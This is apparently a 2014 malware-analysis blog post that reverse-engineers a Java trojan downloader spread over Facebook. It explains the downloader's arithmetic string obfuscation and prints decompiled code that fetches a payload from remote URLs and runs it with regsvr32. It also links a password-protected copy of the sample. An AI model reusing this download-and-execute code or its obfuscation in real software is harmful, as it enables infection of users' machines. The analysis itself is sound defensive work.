Monday, June 23, 2014

Malware spread over Facebook - TrojanDownloader:Java/Carastavona.E

Earlier today, I stumbled upon a blogpost by Bitdefender which describes a malware sample that spreads across Facebook users:

http://www.hotforsecurity.com/blog/its-not-funny-facebook-users-tricked-into-bitcoin-mining-9263.html

I thought I would give it a shot, since I realized while writing my last article that reversing Java malware is quite fun, probably because it is easier and not as exhausting as looking over hundreds or thousands of lines of disassembled code. Unfortunately, the article doesn't give any hashes, just the file name of the malware sample, IMAG00953.zip.


So, after a quick search on Google I found the sample (SHA256: 717fea98bd94ce7b13ffa9ac175d780fb553adde78b89cc861e8885cbb303342) and also (allegedly) found the payloads (Bot + Bitcoin miner). Nevertheless, this article only describes the initial Java downloader.

So, we fire up our favorite Java Decompiler and load the malicious package. At first glance, we see that the file only consists of seven methods and the main loop. We also notice that the names of the seven methods are obfuscated:

Figure 1: Decompiled Java downloader

Next, we take a look at the individual methods and realize that the following methods essentially have the same functionality:

  • DZCMEVYCXARLTFARITYPSICW()
  • WPCJNPJAJ()
  • IYOUMDFKGFCLEVMDYFNPUY()
  • CYZGTWRVCYQBPDXQXF()
  • ZGQTRMCTNPCMWIOCEIKHL()

So, let's pick one of these methods and take a deeper look at how it works. I chose WPCJNPJAJ():

public static String WPCJNPJAJ()
    throws ScriptException
    {
        ScriptEngineManager localScriptEngineManager = new ScriptEngineManager();
        ScriptEngine localScriptEngine = localScriptEngineManager.getEngineByName("JavaScript");
        // Each entry is an arithmetic expression that evaluates to one character code
        String[] arrayOfString = { "5006-4939", "491782/8479", "-178+270", "796-704", "-8394+8478", "-8174+8275", "-9777+9886", "39088/349", "289616/3148", "96784/1052" };
        DecimalFormat localDecimalFormat = new DecimalFormat("#.#");
        StringBuilder localStringBuilder = new StringBuilder(arrayOfString.length);
        for (int i = 0; i < arrayOfString.length; i++)
        {
            // Evaluate the expression in the JavaScript engine and append the result as a char
            Object localObject = localScriptEngine.eval(arrayOfString[i]);
            int j = Integer.parseInt(localDecimalFormat.format(localObject));
            localStringBuilder.append((char)j);
        }
        return localStringBuilder.toString();
    }


First, we see that the method returns a string, so it is probably just a deobfuscation function. At the beginning, a ScriptEngineManager object named localScriptEngineManager is created, and a JavaScript ScriptEngine is obtained from it with the method getEngineByName(). Looking at the array of strings that follows, we see that each string is just a simple arithmetic expression. Each expression is evaluated with the eval() method, and the result is formatted as a decimal number and parsed as an integer. Finally, each integer is appended as a character to the StringBuilder object named localStringBuilder, which is converted into the string that the method returns. What we just saw here is nothing more than the usual JavaScript technique that exploit kits and attackers used in the early days to disguise their code on a compromised host: obfuscated JavaScript code embedded in a Java application...

Of course, we want to know what the obfuscated string is. Instead of using any special fancy tools, I have used a simple text editor with a replace feature and good ol' Microsoft Excel™:

1) Copy the line of code with the obfuscated string into the text editor

String[] arrayOfString = { "5006-4939", "491782/8479", "-178+270", "796-704", "-8394+8478", "-8174+8275", "-9777+9886", "39088/349", "289616/3148", "96784/1052" };


2) Use the replace feature to create a string in the following format

=5006-4939,=491782/8479,=-178+270,=796-704,=-8394+8478,=-8174+8275,=-9777+9886,=39088/349,=289616/3148,=96784/1052


3) Copy and paste this line into Microsoft Excel™ and split it with the text conversion assistant, choosing "," as the separator

Figure 2: Calculated decimal values in Microsoft Excel™

4) Copy the calculated decimal values into an online decimal-to-ASCII converter and we get the final deobfuscated string

"C:\\Temp\\"


Following this scheme, we deobfuscate the other strings and get the following list of strings ordered by method:

DZCMEVYCXARLTFARITYPSICW() -> comma-separated list of Dropbox download URLs

WPCJNPJAJ() -> "C:\\Temp\\"

IYOUMDFKGFCLEVMDYFNPUY() -> "TIWIWSLN.ADZ"

CYZGTWRVCYQBPDXQXF() -> "regsvr32 /s"

ZGQTRMCTNPCMWIOCEIKHL() -> ","
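
The text editor and Excel steps above can also be scripted. The following Python script is an added example, not part of the original analysis: it pulls each expression array out of decompiled source and evaluates it with a small arithmetic-only parser instead of eval(). The regular expression, the function names and the CONSTRUCTED_SEP method in the sample are assumptions made for illustration; only the WPCJNPJAJ array comes from the sample.

```python
import ast
import operator
import re

# Operators seen in the sample's expressions (assumption: no others occur).
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Div: operator.truediv}

def safe_eval(expr):
    """Evaluate one arithmetic string without eval(): numbers and + - / only."""
    def walk(node):
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported expression: {expr!r}")
    return walk(ast.parse(expr.strip(), mode="eval").body)

def decode_array(exprs):
    """Turn a list of arithmetic strings into the text they encode."""
    values = [safe_eval(e) for e in exprs]
    if any(v != round(v) for v in values):  # Integer.parseInt would throw too
        raise ValueError("expression does not yield a whole character code")
    return "".join(chr(round(v)) for v in values)

# Method header followed by the first String[] initializer in its body.
METHOD_RE = re.compile(
    r'String\s+(\w+)\s*\(\).*?String\[\]\s+\w+\s*=\s*\{(.*?)\}', re.S)

def decode_methods(java_source):
    """Map every decoder method in decompiled source to its plain-text string."""
    return {name: decode_array(re.findall(r'"([^"]*)"', body))
            for name, body in METHOD_RE.findall(java_source)}

# WPCJNPJAJ is the array quoted above; CONSTRUCTED_SEP is a made-up second method.
SAMPLE = r'''
public static String WPCJNPJAJ() throws ScriptException {
    String[] arrayOfString = { "5006-4939", "491782/8479", "-178+270", "796-704", "-8394+8478", "-8174+8275", "-9777+9886", "39088/349", "289616/3148", "96784/1052" };
}
public static String CONSTRUCTED_SEP() throws ScriptException {
    String[] arrayOfString = { "4400/100" };
}
'''

if __name__ == "__main__":
    for method, text in decode_methods(SAMPLE).items():
        print(f"{method}() -> {text}")
```

The ten expressions decode to ten characters, so the doubled backslashes shown in "C:\\Temp\\" are part of the decoded string itself.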


Given the deobfuscated strings, we can almost guess the whole functionality of this malware, but let's take a look at the remaining code. The following method named QBCQQV() implements the execution functionality of the downloaded file:

  public static void QBCQQV()
    throws ScriptException, IOException, InterruptedException
  {
    int i = 0;
    while (i < 15)
    {
      // Builds the command line from three deobfuscated strings
      Runtime.getRuntime().exec(CYZGTWRVCYQBPDXQXF() + " " + WPCJNPJAJ() + IYOUMDFKGFCLEVMDYFNPUY());
      Thread.sleep(765L);
      i++;
    }
  }


As you can see, it tries to register the downloaded file by executing the Windows tool regsvr32.exe with the parameter C:\Temp\TIWIWSLN.ADZ inside a loop.

The following method named XDRMGBAEHXBVGKPBEAXDA() actually implements the downloading functionality. After the file has been written to disk, it gets executed by calling the method QBCQQV():

  public static void XDRMGBAEHXBVGKPBEAXDA(String paramString1, String paramString2)
    throws IOException, ScriptException, InterruptedException
  {
    // paramString1 is the download URL, paramString2 the destination path
    InputStream localInputStream = URI.create(paramString1).toURL().openStream();
    Files.copy(localInputStream, Paths.get(paramString2, new String[0]), new CopyOption[0]);
    QBCQQV();
  }


Now that we have analyzed each of the methods, let's take a look at the main function to summarize the functionality of this Java downloader:

  public static void main(String[] paramArrayOfString)
    throws Exception
  {
    new File(WPCJNPJAJ()).mkdir();
    File localFile = new File(WPCJNPJAJ() + IYOUMDFKGFCLEVMDYFNPUY());
    if (localFile.exists())
    {
      QBCQQV();
    }
    else
    {
      // Split the deobfuscated URL list on the deobfuscated separator
      String[] arrayOfString1 = DZCMEVYCXARLTFARITYPSICW().split(ZGQTRMCTNPCMWIOCEIKHL());
      for (String str1 : arrayOfString1)
      {
        URL localURL = new URL(str1);
        HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
        localHttpURLConnection.connect();
        // Any 2xx response: download from this URL and stop trying the others
        if (localHttpURLConnection.getResponseCode() / 100 == 2)
        {
          String str2 = str1;
          String str3 = WPCJNPJAJ() + IYOUMDFKGFCLEVMDYFNPUY();
          XDRMGBAEHXBVGKPBEAXDA(str2, str3);
          break;
        }
      }
    }
  }
}


First, the malware creates the folder C:\Temp\ and builds a File object for a file named TIWIWSLN.ADZ inside that folder. If the file already exists, it registers it by calling the function QBCQQV(). Otherwise, it tries to download the file by connecting to the Dropbox URLs one by one. As soon as one of them responds successfully, it writes the file to disk and registers it in the Windows registry (regsvr32.exe).

At the time of this writing, none of the URLs were available anymore.

The malicious Java file can be downloaded here: https://www.dropbox.com/s/05tjo8rogochvkx/TrojanDownloader_Java_Carastavona.E.zip
Password: "infected" (without "")


Update
More info related to this threat can be found here: http://www.malekal.com/2014/06/10/en-virus-facebook-hahaha/


That's it, have a nice day...